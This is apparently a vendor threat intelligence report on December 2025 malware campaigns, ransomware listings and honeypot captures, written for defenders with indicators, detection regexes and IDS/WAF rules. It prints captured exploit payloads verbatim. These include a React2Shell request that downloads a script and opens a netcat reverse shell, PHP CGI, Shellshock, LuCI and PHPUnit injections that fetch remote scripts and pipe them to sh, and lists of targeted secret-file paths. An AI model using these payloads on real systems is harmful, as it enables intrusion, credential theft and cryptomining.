Threat intelligence summary based on real-time data from Baysec CTI and complementary open-source intelligence sources. Analysis accelerated by Baysec Intelligence AI.

Table of Contents

1. BLUF (Bottom Line Up Front)
2. Executive Summary
3. Key Trends Observed
4. Regional Focus: Poland
   • Intrusion-Sets Targeting Poland
   • Alleged Ransomware Victims
5. Dark Web & Breach Intelligence
   • December 2025 Ransomware Landscape
   • Breach Reports & Credential Leaks
   • Polish Credential Exposure
6. Vulnerability Intelligence
   • Vulnerabilities Used as Lures
   • Actively Weaponized Vulnerabilities
7. Campaign Analysis
   • Webrat RAT via Fake GitHub Exploits
   • ClickFix Steganography
   • GhostPoster Firefox Extensions
   • lotusbail npm Package
   • MacSync Stealer Evolution
   • APT37 Artemis
   • DriverFixer0428
8. Malware Inventory
9. Technical Appendix: Honeypot Intelligence
   • Baysec Sensor Analysis
   • SMB Bruteforce Campaign
   • MSSQL Attack Patterns
   • SSH Bruteforce Analysis
   • NTLMv2-SSP Authentication Capture
   • Egypt & Russia Deep Dive
   • SMTP Honeypot Analysis
   • React2Shell Exploitation
   • RedTail Cryptominer & PHP CGI
   • Cisco VPN (AnyConnect) Probing
   • Rondo Botnet (Mirai Variant)
   • IoT & Network Device Exploitation
   • Environment & Secrets Harvesting
10. MITRE ATT&CK Mapping
11. Indicators of Compromise
12. Recommendations
13. Assessment Confidence Levels
14. Conclusion
15. References

BLUF (Bottom Line Up Front)

Supply-chain attacks via trusted platforms (GitHub, npm, PyPI) and critical vulnerabilities with active exploitation dominate December 2025. Patch immediately: PHP CGI (CVE-2024-4577, CISA KEV), React Server Components (CVE-2025-55182), n8n (CVE-2025-68613, 103K exposed). Poland: 4 alleged ransomware victims (LockBit5, SAFEPAY, Qilin, Anubis); 2.5M+ Polish credentials leaked. See Indicators of Compromise for blocklist.

Executive Summary

Supply-chain attacks, weaponized open-source repositories, and increasingly evasive malware dominate the current threat landscape. Threat actors abuse legitimate platforms (GitHub, npm, PyPI, Chrome Web Store) to reach developers, security researchers, and ordinary users.

Key Developments

• Fake exploit repositories distributing Webrat RAT via GitHub, targeting security researchers with lures for recent CVEs
• Malicious npm package (lotusbail) - 56K+ downloads, hijacks WhatsApp sessions via hardcoded pairing codes; attacker access persists after package removal
• Critical n8n vulnerability (CVE-2025-68613, CVSS 9.9) with 103K+ exposed instances and public PoC
• React2Shell exploitation active (CVE-2025-55182) - 223 attacks from 26 IPs with multiple C2 infrastructure
• PHP CGI mass exploitation (CVE-2024-4577, CVSS 9.8) - 1,276+ attempts deploying RedTail cryptominer
• Cisco VPN reconnaissance - coordinated probing of AnyConnect infrastructure from cloud IPs
• Rondo botnet active - Mirai variant exploiting Shellshock, PHPUnit RCE, and OpenWRT vulnerabilities
• IoT & network device exploitation (965+ events) - Hikvision cameras (CVE-2021-36260), GPON routers, D-Link devices, QNAP NAS (CVE-2024-21899), Realtek SDK routers (CVE-2021-35395), Docker registries exposed
• Environment file harvesting - 1,761 requests targeting application secrets and cloud credentials
• Steganography adoption by ClickFix and GhostPoster campaigns to evade detection
• macOS targeting increase - signed/notarized malware bypassing Gatekeeper (MacSync Stealer, DriverFixer0428)
• APT37 active targeting South Korean entities via Artemis campaign

Immediate Actions

1. Patch critical vulnerabilities: n8n, Next.js/React Server Components, PHP CGI, Apache 2.4.49/2.4.50
2. Audit dependencies: Remove malicious packages from npm (lotusbail) and PyPI (smtrlib)
3. Remove browser extensions: GhostPoster Firefox extensions (17 total)
4. Block C2 infrastructure: See Indicators of Compromise for full blocklist

Honeypot Intelligence

11 days of data (Dec 17-27) | 12.3M+ total events captured

Baysec sensors detected persistent exploitation across multiple protocols:

• SMB/Windows: 1.5M+ authentication events capturing NTLMv2 hashes
• SSH: 395K+ brute force attempts including Mirai botnet signatures and Solana validator targeting
• Web exploitation: React2Shell (223), PHP CGI (1,276), PHPUnit RCE (483), environment file harvesting (1,761)
• Infrastructure probing: Cisco VPN (73), SMTP open relay abuse (2,600) - attackers actively seek mail servers to use as phishing infrastructure, DNS reconnaissance (1,355)

Persistent threat sources: Russia (1.1M+ events) and Egypt (2.4M+ events) dominate attack traffic, with captured credentials revealing compromised corporate Active Directory environments.

Poland Assessment

Ransomware groups listed 4 organizations on leak sites: LockBit5 (mostykatowice.pl, Dec 26), SAFEPAY (polhun.pl, Dec 24-25), Qilin (PODOVIA, Dec 17), Anubis (Duhabex, Dec 5). Verified active threat actors: LockBit5, nova (RALord RaaS) with 10 victims.

Credential exposure: Baysec tracked 2.5M+ Polish credentials across December dumps and combolists; targeted combolists for Polish email providers appearing daily.

Dark Web Monitoring

Baysec CTI discovered 10 new ransomware leak sites in December: evolution, waissbein, osiris, black shrantac, ms13-089, minteye, dark shinigami, cry0, akirat, rustylocker.

Key Trends Observed

Regional Focus: Poland

Intrusion-Sets Targeting Poland (December 2025)

Ransomware / Major Threat Groups

Hacktivist / Defacement Groups

Data Brokers & Initial Access Sellers

Alleged Ransomware Victims (Poland - December 2025)

DISCLAIMER: Ransomware groups listed the following organizations on their leak sites. Inclusion here indicates the threat actors claim to have compromised these organizations. This does not constitute confirmation of a successful breach - threat actors may have incorrectly listed organizations, victims may have paid ransom (data removed then re-added), or threat actors may have fabricated listings for reputation purposes.

Analyst Note: Four distinct ransomware groups listed Polish organizations on their leak sites in December 2025. LockBit5 continues the LockBit franchise post-Operation Cronos; Qilin is a sophisticated RaaS operator with global reach; SAFEPAY and Anubis are mid-tier operators.

Dark Web & Breach Intelligence

December 2025 Ransomware Landscape

December 2025 Statistics: 781 confirmed victims across 58 ransomware groups

Most Active Ransomware Groups (December 2025)

Critical Global Incidents

New Ransomware Leak Sites (December 2025)

Ransomware Tool Leaks

Breach Reports & Credential Leaks

Polish Credential Exposure

Baysec CTI tracked credential dumps targeting Polish organizations:

Major Credential Leaks (Global)

Vulnerability Intelligence

Vulnerabilities Used as Lures (Webrat Campaign)

Assessment: Threat actors leverage recently disclosed, high-profile vulnerabilities as social engineering lures. Threat actors use the following CVEs to create convincing fake exploit repositories.
Confidence: HIGH (based on Kaspersky analysis of 15 malicious repositories)

Analyst Note: The selection of these CVEs demonstrates operational sophistication. All three are recent, have media coverage, and affect widely-deployed products. The Webrat operators specifically chose vulnerabilities that would attract security professionals rather than general users.

Actively Weaponized Vulnerabilities

Assessment: The following vulnerabilities have confirmed public exploits and threat actors actively scan or exploit them in the wild.
Confidence: HIGH (NVD data, Censys scanning data, PoC repositories confirm active exploitation)

Priority Assessment:

1. CRITICAL - CVE-2024-4577: Patch immediately. CISA KEV, EPSS 94.37%, mass exploitation by RedTail. Block 178.16.55.224.
2. CRITICAL - CVE-2025-55182: Patch immediately. Threat actors actively exploit with confirmed C2 infrastructure. Block 94.154.35.154 and 193.142.147.209.
3. CRITICAL - CVE-2025-68613: Patch immediately. 103k+ exposed instances with public PoC represents significant risk.
4. MEDIUM - Other CVEs: Monitor for exploitation; patch during normal maintenance windows.

Campaign Analysis

Campaign: Webrat RAT via Fake GitHub Exploits

Attribution: Unknown criminal actor (likely financially motivated)
Confidence: HIGH
First Observed: May 2025 (game cheats); September 2025 (pivot to fake exploits)
Status: ACTIVE (GitHub removed repositories, but operators will likely create new ones)

Summary: Kaspersky researchers discovered 15 malicious GitHub repositories distributing Webrat malware disguised as PoC exploits for the high-profile vulnerabilities documented above.

Targeting: Originally gamers (Rust, Counter-Strike, Roblox cheats). Since September 2025, operators pivoted to security researchers and students - likely to access more valuable credentials and potentially compromise security tooling.

Technical Execution:

Phase 1: Initial Access

• Victim discovers GitHub repository claiming PoC for CVE-2025-XXXXX
• Repository contains AI-generated README with convincing technical details
• Operators offer password-protected archive for download

Phase 2: Execution

• Victim extracts and executes rasmanesc.exe
• Dropper attempts privilege escalation
• Dropper disables Windows Defender via registry/policy manipulation
• Dropper downloads Webrat payload from hardcoded C2 URL

Phase 3: Actions on Objectives

• Exfiltrates cryptocurrency wallets
• Steals Steam/Discord/Telegram credentials
• Enables webcam surveillance
• Captures screenshots
• Logs keystrokes for additional credential harvesting

Indicators:

• Password-protected archives in GitHub repositories
• AI-generated README content (generic phrasing, formatting inconsistencies)
• File: rasmanesc.exe (dropper)
• Targeting recently disclosed CVEs with media coverage

Campaign: ClickFix Steganography

Attribution: Unknown criminal actor
Confidence: HIGH
First Observed: October 2025
Status: ACTIVE (infrastructure partially disrupted by Operation Endgame, November 2025)

Summary: Huntress documented a multi-stage attack combining social engineering with steganography. Security researchers track the campaign since October 2025. Attackers embed malicious payloads in images and trick users into executing PowerShell commands.

Technical Execution:

Phase 1: Social Engineering (ClickFix)

• Victim encounters fake Windows Update full-screen interface
• Interface instructs user to press Win+R
• Malware auto-pastes malicious command from clipboard
• User executes MSHTA payload

Phase 2: Payload Retrieval

• MSHTA contacts C2 at 141.98.80.175
• MSHTA downloads and executes PowerShell script
• PowerShell retrieves PNG images containing hidden payloads

Phase 3: Steganography Extraction

• Custom algorithm targets red channel of BGRA pixel data
• Extracts shellcode by XORing calculated values with red channel bytes
• XOR key: 114
• Loader injects decrypted shellcode into memory

Phase 4: Execution

• Donut-packed payload executes entirely in memory
• Malware creates no disk artifacts
• ctrampoline technique: 10,000 empty function calls to evade analysis
• Final payload: LummaC2 or Rhadamanthys infostealer

Evasion Assessment: SOPHISTICATED

• Memory-only execution defeats file-based detection
• Steganography bypasses network content inspection
• ctrampoline technique complicates dynamic analysis
• Legitimate-appearing image files avoid suspicion

Infrastructure:

• C2: 141.98.80.175 (MSHTA stages, PowerShell loaders)
• Payload delivery: PNG images on attacker-controlled servers

Payloads: LummaC2, Rhadamanthys

Campaign: GhostPoster Firefox Extensions

Attribution: Unknown criminal actor (financially motivated - ad fraud, affiliate hijacking)
Confidence: HIGH
First Observed: September 2025
Status: MITIGATED (Mozilla removed extensions)

Summary: Koi Security uncovered 17 compromised Firefox extensions with 50,000+ combined downloads. Attackers use steganography to hide malicious JavaScript in extension icons.

Kill Chain Analysis:

Affected Extensions:

Remediation: Mozilla removed all extensions and updated automated detection systems.

Campaign: lotusbail npm Package (WhatsApp Stealer)

Attribution: Unknown criminal actor
Confidence: HIGH
First Observed: May 2025
Status: ACTIVE (npm removed package, but attacker access persists for infected users)

Summary: Koi Security discovered a malicious npm package with 56,000+ downloads. The package provides a functional WhatsApp API while simultaneously exfiltrating credentials to attacker infrastructure.

Technical Execution:

Phase 1: Developer Integration

• Developer installs lotusbail for WhatsApp functionality
• Attacker based package on legitimate Baileys library
• Package provides real, working WhatsApp API functions

Phase 2: Credential Harvesting

• Library hijacks 8-character device pairing code mechanism
• Hardcoded pairing code adds attacker device as trusted endpoint
• Library intercepts all messages in real-time
• Library harvests contacts
• Library steals credentials and AES-encrypts before exfiltration

Phase 3: Persistence

• CRITICAL: Attacker’s linked device remains connected even after package removal

Anti-Analysis Capabilities:

1. 27 infinite loop traps detect debugging tools
2. Unicode variable manipulation obfuscation
3. LZString compression
4. Base-91 encoding
5. AES encryption of exfiltrated data

CRITICAL REMEDIATION NOTE: Uninstalling the package does NOT remove attacker access. Victims must manually unlink ALL devices from WhatsApp settings.

Campaign: MacSync Stealer Evolution

Attribution: Criminal actor “Mentalpositive”
Confidence: HIGH
First Observed: April 2025 (as Mac.C); July 2025 (rebrand to MacSync)
Status: MITIGATED (Apple revoked certificate)

Summary: This macOS infostealer evolved to use signed and notarized Swift applications, bypassing Gatekeeper and XProtect. Jamf Threat Labs analyzed the evolution and documented new evasion techniques.

Technical Execution:

Phase 1: Distribution

• Victim downloads zk-call-messenger-installer-3.9.2-lts.dmg
• Source: zkcall.net/download
• Attacker inflates DMG to 25.5MB with decoy PDFs

Phase 2: Gatekeeper Bypass

• Legitimately signed and notarized Swift application
• Initial app contains NO malware (passes all checks)
• Gatekeeper and XProtect approve execution

Phase 3: Payload Retrieval

• App performs internet connectivity check (sandbox evasion)
• App retrieves encoded script from remote server
• App decodes and executes script

Phase 4: Credential Theft

• Exfiltrates iCloud Keychain credentials
• Extracts browser passwords
• Collects system metadata
• Steals cryptocurrency wallet data
• Go-based agent provides full C2 capability

Phase 5: Cleanup

• Wipes scripts after execution
• Removes temp files
• Memory-only execution minimizes forensic artifacts

Remediation Status: Apple revoked the developer certificate after Jamf’s report.

Campaign: APT37 Artemis

Attribution: APT37 / Reaper / ScarCruft (North Korea, state-sponsored)
Confidence: HIGH
First Observed: October 2023 (C2 infrastructure); December 2025 (current campaign)
Status: ACTIVE

Summary: North Korean threat group APT37 targets South Korean academics, journalists, and policy experts via social engineering. Genians Security Center analyzed the campaign and attributed it to DPRK state actors.

Targeting: Individuals with expertise in:

• North Korean affairs
• Human rights issues
• Korean peninsula policy

Technical Execution:

Phase 1: Social Engineering

• Spearphishing email from “Korean TV program writer”
• Proposes interview about North Korean affairs
• Attachment: Malicious HWP (Hangul Word Processor) document

Phase 2: Initial Compromise

• Victim opens HWP document and enables content
• Malicious OLE object executes
• Malware deploys files to temporary folder

Phase 3: DLL Side-Loading

• Executes legitimate Microsoft Sysinternals utilities
• Places malicious version.dll in same directory
• Windows loads attacker DLL instead of legitimate library
• Executables: vhelp.exe, mhelp.exe

Phase 4: Payload Decryption

• Multi-stage XOR decryption
• Loader activates final shellcode

Phase 5: RoKRAT Deployment

• Data-stealing payload with full remote access capability

C2 Infrastructure:

Analyst Note: Geographic separation of C2 across Russia and Switzerland demonstrates deliberate tradecraft to complicate attribution and evade geographic blocking.

Campaign: DriverFixer0428 (Contagious Interview)

Attribution: Contagious Interview / DEV#POPPER (North Korea, state-sponsored)
Confidence: HIGH
First Observed: 2023 (campaign); December 2025 (current sample)
Status: PARTIALLY DISRUPTED (FBI seized BlockNovas domain, April 2025)

Summary: Security researchers attribute macOS credential stealer to North Korean Contagious Interview campaign.

Targeting: Software developers and cryptocurrency professionals seeking employment.

Technical Execution:

Phase 1: Social Engineering

• Victim contacted for fake job interview
• Request to install “VCam” or “CameraAccess” for video call
• Malware delivered as required interview software

Phase 2: Credential Harvesting

• OverlayWindowController creates fullscreen overlay
• Overlay prevents interaction until credentials entered
• Impersonates macOS system prompts
• Impersonates Chrome permission dialogs

Phase 3: Sandbox Evasion

• sysctlbyname API checks for VM
• IOKit checks for virtualization
• NSScreen checks for analysis environment
• Static analysis: clearly malicious; Dynamic sandbox score: 4/10 “likely benign”

Phase 4: Exfiltration

• Credentials sent to attacker via Dropbox API

Law Enforcement Action: FBI seized BlockNovas domain (April 2025).

Malware Inventory

Technical Appendix: Honeypot Intelligence

Baysec Sensor Analysis (December 2025)

Data Source: Baysec Sensor cluster
Period: December 17-27, 2025 (11 days)
Total Events: 12.3M+ events
Risk Level: HIGH - Sustained

Top Threat Actors by Attack Volume

Primary Threat: 159.195.63.33 (DXC Technology, Denmark) is the top attacking IP with 364K+ events targeting SMB/RDP services, exploiting CVE-2020-0796 (SMBGhost).

SMB Bruteforce Campaign Analysis (Port 445)

Attack Volume: PRIMARY ATTACK VECTOR

SMB Attack Techniques Baysec Observed:

• SMB1/SMB2 protocol negotiation (downgrade attacks)
• NTLM authentication brute force
• IPC$ share enumeration (\\192.168.56.20\IPC$, \\192.168.1.1\IPC$)
• STATUS_ACCESS_DENIED (0xc0000022) response harvesting
• STATUS_MORE_PROCESSING_REQUIRED (0xc0000016) exploitation

Legacy Systems Targeted: Honeypot responses show attackers probing for Windows Server 2003 3790 Service Pack 2 - indicating searches for EOL/unpatched systems.

MSSQL Attack Patterns (Port 1433)

Concentrated Attack Source: IP range 185.242.246.* (coordinated scanning/exploitation)

Attack Techniques:

• Port 1433 scanning and connection attempts
• Database credential brute forcing (sa, admin accounts)
• TDS protocol exploitation attempts
• SQL Server version fingerprinting

Primary Attacker: 189.124.135.33 (Brazil) running Microsoft SQL Server 2022 GDR (16.0.1121.0) - attackers likely use this compromised database server for attacks.

SSH Bruteforce Analysis (Port 22)

Data Source: Baysec SSH honeypot
Total Events: 366,000+ authentication attempts (December 2025)
Successful Logins (honeypot): 1,401+ events
MITRE ATT&CK: T1110.001 - Brute Force: Password Guessing, T1110.003 - Password Spraying

Top 10 Usernames Attempted:

Top 10 Passwords Attempted:

Successful Credential Pairs (Honeypot Captures):

Analyst Notes:

• Cryptocurrency targeting: sol, solana, solv (validator) usernames show heavy targeting of Solana infrastructure - attackers targeting crypto validator nodes for fund theft
• Service accounts: postgres, oracle show database infrastructure targeting
• Mirai signatures: 345gs5662d34 username/password in password attempts indicates active Mirai botnet scanning for IoT devices

SMB Attack Analysis - NTLMv2-SSP Authentication Capture

Data Source: Baysec Windows honeypot
Total Authentication Attempts: Baysec honeypot captured 1,447,000+ SMB authentication events (December 2025)
Intelligence: Attackers attempting SMB authentication send NTLMv2-SSP credentials to the honeypot, revealing their usernames, domains, and crackable password hashes.
MITRE ATT&CK: T1021.002 - SMB/Windows Admin Shares

Top 10 Usernames in NTLM Captures:

Top 10 Attacking IPs for NTLM Capture:

Sample Captured Hash (attacker-sourced):

1

Isaac:::f020e5b9c858043a:4A91B24B9B69CDFDC5988050076DB8BC:0101000000000000003F7EA04F6FDC01...

Intelligence Value: Windows honeypot captures NTLM hashes that attackers inadvertently send when attempting to authenticate. These are attacker credentials - revealing usernames, domain configurations, and potentially crackable passwords captured from threat actor infrastructure.

Persistent Threat Sources: Egypt & Russia Deep Dive

Assessment: IPs from Egypt and Russia represent persistent, high-volume threat sources across multiple attack vectors. Both show sustained activity throughout December 2025 with distinct operational patterns.

🇪🇬 Egyptian IPs Threat Assessment

Top Egyptian Attacking IPs:

Top Egyptian Usernames Captured (SMB/NTLM):

Operational Pattern: Egyptian IPs focus exclusively on Windows/SMB environments. No SSH activity observed. Targeting suggests Windows Active Directory credential harvesting for lateral movement or resale.

🇷🇺 Russian IPs Threat Assessment

Top Russian Attacking IPs:

Top Russian Usernames Captured (SMB/NTLM):

Cyrillic Username Analysis:

Operational Pattern: Russian IPs demonstrate multi-protocol capabilities - attacking SSH, SMB, and web services simultaneously. The scale (20,000+ events from single IPs) and persistence suggest organized campaigns rather than opportunistic scanning.

Key Finding: Russian and Egyptian IPs are major persistent threat sources. Russian IPs show sophisticated multi-vector capabilities while Egyptian ones focuse exclusively on Windows credential harvesting. Both warrant enhanced monitoring and blocking.

Targeted Services Summary

SMTP Honeypot Analysis (Port 25)

Data Source: Baysec SMTP honeypot
Period: December 2025
Total Events: 2,582
Risk Level: HIGH - Threat actors actively attempt to abuse SMTP for phishing distribution

Baysec SMTP honeypot captured active attempts to abuse open mail relays for phishing and spam distribution. Attackers probe for misconfigured mail servers to distribute malicious emails without attribution.

Top SMTP Attackers

Observed Attack Patterns

1. Credential Brute Force (AUTH LOGIN)

1
2
3
4

EHLO User
AUTH LOGIN
[Base64 encoded credentials]
QUIT

Primary attackers: 103.39.64.54, 45.144.212.19 - high-volume automated credential stuffing against SMTP authentication.

2. Phishing Distribution Attempts

3. Open Relay Testing

Multiple IPs from 158.94.x.x, 178.16.x.x, 185.169.x.x (Railnet LLC infrastructure) testing relay capabilities with spameri@tiscali.it sender - coordinated open relay reconnaissance.

4. Security Scanner Traffic

Legitimate scanner traffic excluded: Censys, Palo Alto Cortex Xpanse, cypex.ai, Reposify - reconnaissance traffic, not malicious.

Phishing Infrastructure Indicators

Assessment: Threat actors actively scan for and attempt to abuse misconfigured SMTP servers for phishing distribution. Organizations should ensure mail servers are not open relays and implement proper authentication (SPF, DKIM, DMARC).

Observed Campaign: React2Shell Exploitation (CVE-2025-55182)

Vulnerability: React Server Components RCE
Risk Level: CRITICAL
Status: ACTIVE
Period: 2025-12-17 → 2025-12-27
Total Events: 223+ (IDS-confirmed attacks)

Baysec honeypots captured 223+ confirmed React2Shell (CVE-2025-55182) exploit attempts from 26 unique source IPs across 11 days. Activity is persistent automated mass scanning with payloads containing active C2 callbacks, staged malware downloads, and reverse shell commands - clear evidence of weaponized exploitation beyond vulnerability scanning.

C2 INFRASTRUCTURE:

• Staging: 94.154.35.154/weball.sh - post-exploitation script
• Reverse Shell: 193.142.147.209:12323 - active listener
• Malware Delivery: 5.255.121.141 - binary payload server

Attack Volume & Source IPs

Timeline: 2025-12-17 → 2025-12-27 UTC (sustained 11-day campaign with daily activity)

C2 Infrastructure

Two distinct threat actors identified:

Actor 2 Characteristics:

• Uses distinctive boundary marker (see IoCs below)
• Downloads binary from 5.255.121.141
• Writes to multiple locations (/tmp/lrt, /dev/lrt, /dev/shm/lrt) for persistence
• Makes binary executable and runs in background

Targeted Endpoints

Attackers probed multiple paths across standard and non-standard ports:

Exploit Technique

Attack Vector: RSC serialization exploitation via prototype pollution

Exploit Pattern (canonical):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "_response": {
    "_prefix": "process.mainModule.require('child_process').execSync('...')",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

RCE Payload Example (captured):

1
2
3
4

cd /tmp; wget -O /tmp/x.sh http://94.154.35.154/weball.sh;
chmod +x /tmp/x.sh; sh /tmp/x.sh;
rm /tmp/f; mkfifo /tmp/f;
cat /tmp/f|/bin/sh -i 2>&1|nc 193.142.147.209 12323 >/tmp/f

HTTP Indicators (Detection Signatures)

Custom Headers (HIGH confidence):

Boundary Marker Variants (Actor Fingerprints):

Boundary Pattern Analysis:

The distinctive boundary markers indicate:

1. A specific exploit toolkit or threat actor
2. Actor 2 downloads a binary payload rather than shell scripts

Targeted Ports (non-standard):

• Port 80 (standard HTTP)
• Port 88 (Kerberos - commonly exposed)
• Port 445 (SMB - probing for web services on Windows)

User-Agents Observed:

1
2
3
4
5
6
7
8
9

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (Chrome/Edge)  # Most common
Go-http-client/1.1                                                          # 5.187.35.21
Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv)         # Samsung Galaxy Z Fold
Mozilla/5.0 (iPhone; CPU iPhone OS 17_7...) CriOS/134.0.6998.99             # iOS Chrome
Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39)       # Old Android TV box
Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36                 # ChromeOS
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136
Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36                       # Generic Android
Mozilla/5.0                                                                 # Minimal

User-Agent Analysis: The variety of User-Agents (desktop, mobile, ChromeOS, Android TV) indicates the scanning toolkit rotates UAs to evade detection. The SM-F9560 (Samsung Galaxy Z Fold 6) and NEO-X5 (Android TV box) are unusual and may indicate spoofing or compromised devices.

Detection Signatures

Detection Strings (regex):

1
2
3
4
5
6

\$1:__proto__:then
\$1:constructor:constructor
process\.mainModule\.require\('child_process'\)
throw Object\.assign\(new Error\('NEXT_REDIRECT'\)
wget.*weball\.sh
nc\s+\d{1,3}(\.\d{1,3}){3}\s*12323

Detection Rules

IDS Rule:

1
2
3
4
5

alert http any any -> any any (msg:"React2Shell CVE-2025-55182 Exploit Attempt";
  flow:established,to_server; content:"POST"; http_method;
  content:"$1:__proto__:then"; http_client_body;
  content:"constructor:constructor"; http_client_body;
  classtype:web-application-attack; sid:2025551820; rev:1;)

WAF Rule:

1
2
3
4

Block if:
  HTTP POST AND
  Content-Type contains "multipart/form-data" AND
  Body matches /(\$1:__proto__:then|\$1:constructor:constructor|process\.mainModule)/

Network-Level Indicators:

• Block egress to 193.142.147.209:12323 (reverse shell)
• Block downloads from 94.154.35.154/weball.sh and 5.255.121.141
• Alert on distinctive boundary markers (see IoC table)

Assessment

Threat Actor Analysis: Opportunistic, automated scanning tools drive this activity, quickly incorporating CVE-2025-55182 post-disclosure. The variety of User-Agents and targeted endpoints indicates broad scanning. RCE payloads with C2 callbacks show attackers seek persistent access, not just vulnerability identification.

References

• Baysec honeypot events (2025-12-17 → 2025-12-27)
• CVE-2025-55182 public PoCs (GitHub)
• Captured payloads and request bodies

Observed Campaign: RedTail Cryptominer & PHP CGI Exploitation (CVE-2024-4577)

Vulnerability: PHP CGI Argument Injection + Docker API targeting
Risk Level: CRITICAL
Status: ACTIVE
Period: 2025-12-17 → 2025-12-27
Total Events: 1,276+ (libredtail-http user-agent signature)

Baysec web honeypot captured 1,276+ exploitation attempts from 30+ unique source IPs (including IPv6) over 11 days, revealing four distinct threat patterns: mass exploitation of CVE-2024-4577 (PHP CGI Argument Injection), PHPUnit RCE exploitation (CVE-2017-9841), ThinkPHP RCE (CVE-2018-20062), and Docker API targeting.

Key Finding: RedTail operators demonstrate multi-vector capability, combining PHP exploitation with Docker API targeting and systematic credential harvesting. IPv6 infrastructure detected - attackers use 2001:41d0:601:1100::779b as primary scanner (162 events).

CVE-2024-4577 Mass Exploitation

Vulnerability Profile:

Attack Vector Observed:

1
2
3
4
5
6

GET /cgi-bin/%%32%65%%32%65/.../bin/sh
GET /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
POST: <?php shell_exec(base64_decode("(wget --no-check-certificate -qO-
      https://178.16.55.224/sh || curl -sk https://178.16.55.224/sh)
      | sh -s cve_2024_4577.selfrep")); ?>
User-Agent: libredtail-http

C2 Infrastructure: 178.16.55.224 (USA, Railnet LLC) - 15 malicious detections on VirusTotal, self-signed certificate infrastructure.

RedTail Cryptominer - PHP CGI & Docker API Targeting

Evolution Assessment: RedTail has expanded from traditional cryptomining operations to targeting containerized infrastructure via exposed Docker APIs. Security researchers first observed this tactical evolution in public reporting November 2025.

Timeline: 2025-12-17 → 2025-12-27 UTC (continuous 11-day campaign with daily activity)

Significance: RedTail’s pivot to Docker infrastructure indicates opportunistic targeting of cloud-native environments. Organizations with exposed Docker APIs face dual risk: cryptomining resource abuse and potential container escape. Activity is geographically distributed across 9 countries with no single dominant source.

Credential Harvesting Campaign

Attribution: Russian-nexus infrastructure (operators host via UK proxy)
Primary Sources: 78.153.140.179, 78.153.140.224
Events: 61 combined

Targeted Paths:

1
2
3
4
5
6

/secrets/aws/session.yml
/private/.env.production
/staging/.env.production
/config/aws_settings.php
/aws/konfig/aws_auth.php
/.env

Assessment: Systematic enumeration targeting AWS credentials and application secrets. Pattern indicates automated tooling scanning for misconfigured deployments.

PHP Framework Exploitation

Multiple PHP framework RCE attempts captured:

Attack Source Analysis

Detection Signatures

User-Agent Detection:

1
2
3

libredtail-http                              # RedTail fingerprint
Mozilla/5.0 (compatible; CensysInspect/1.1)  # Reconnaissance
Mozilla/5.0 zgrab/0.x                        # Zgrab scanner

Path-Based Detection (WAF/IDS):

1
2
3
4
5

.*\.env.*
.*eval-stdin\.php.*
.*think\\app.*invokefunction.*
.*pearcmd.*
.*allow_url_include.*

Risk Assessment

References

• CVE-2024-4577 - NVD
• CISA KEV Catalog
• Baysec honeypot telemetry (2025-12-17 → 2025-12-27)
• VirusTotal: 163.5.148.15, 78.153.140.179, 178.16.55.224

Observed Campaign: Cisco VPN (AnyConnect) Probing (CVE-2020-3452)

Threat Type: Vulnerability Reconnaissance
Risk Level: MEDIUM
Status: ACTIVE
Period: 2025-12-17 → 2025-12-27
Total Events: 73

Baysec honeypots captured 73 probing attempts targeting Cisco AnyConnect VPN infrastructure from 19 unique source IPs - all originating from DigitalOcean infrastructure. The coordinated nature (4 events per IP, identical patterns) indicates automated reconnaissance tooling.

Targeted Endpoints

Source IPs (DigitalOcean Infrastructure)

Assessment

Pattern Analysis:

• All 19 IPs performed exactly 4 requests (one per path)
• All hosted on DigitalOcean infrastructure
• Targeting Cisco AnyConnect SSL VPN authentication/Java components
• Indicative of vulnerability scanning for CVE-2020-3452 (Cisco ASA Path Traversal) or similar

Risk: Organizations running Cisco ASA/FTD with AnyConnect should:

• Ensure patched against CVE-2020-3452 (CVSS 7.5)
• Monitor for /+CSCOE+/ and /+CSCOL+/ path access
• Block DigitalOcean ranges if not expected traffic source

Observed Campaign: Rondo Botnet (Mirai Variant)

Threat Type: IoT Botnet / Multi-Vector Scanner
Risk Level: HIGH
Status: ACTIVE
Period: 2025-12-17 → 2025-12-27
Events: 441+

Baysec honeypots captured 441+ exploitation attempts from the Rondo botnet, a Mirai variant targeting IoT devices and web applications. The botnet employs multiple attack vectors simultaneously, including Shellshock (CVE-2014-6271), PHPUnit RCE (CVE-2017-9841), and OpenWRT LuCI command injection (CVE-2023-1389).

Key Finding: Rondo operators embed their email attribution signature (rondo2012@atomicmail.io) directly in User-Agent strings and Shellshock payloads - unusual OPSEC failure suggesting amateur operators or deliberate false flag.

Attack Infrastructure

Exploitation Vectors

1. Shellshock (CVE-2014-6271) - User-Agent Injection:

1

User-Agent: () { :; }; /bin/bash -c "(wget -qO- http://41.231.37.153/rondo.ame.sh||busybox wget -qO- http://41.231.37.153/rondo.ame.sh||curl -s http://41.231.37.153/rondo.ame.sh)|sh"& # rondo2012@atomicmail.io

Targets: /cgi-bin/slogin/login.py, /cgi-bin/jarrewrite.sh

2. OpenWRT LuCI Command Injection (CVE-2023-1389):

1
2

GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=`busybox wget -qO- http://41.231.37.153/rondo.zqq.sh|sh`
User-Agent: Mozilla/5.0 (rondo2012@atomicmail.io)

3. PHPUnit RCE (CVE-2017-9841):

1
2

POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Body: <?php system('(wget -qO- http://41.231.37.153/rondo.dtm.sh||busybox wget -qO- http://41.231.37.153/rondo.dtm.sh||curl -s http://41.231.37.153/rondo.dtm.sh)|sh&'); ?>

Payload Variants Observed

Detection Signatures

1
2
3
4
5
6
7
8
9

# User-Agent patterns
rondo2012@atomicmail\.io
Mozilla/5\.0 \(rondo2012@

# URL patterns
41\.231\.37\.153/rondo\.\w+\.sh

# Shellshock in headers
\(\)\s*\{\s*:\s*;\s*\}\s*;

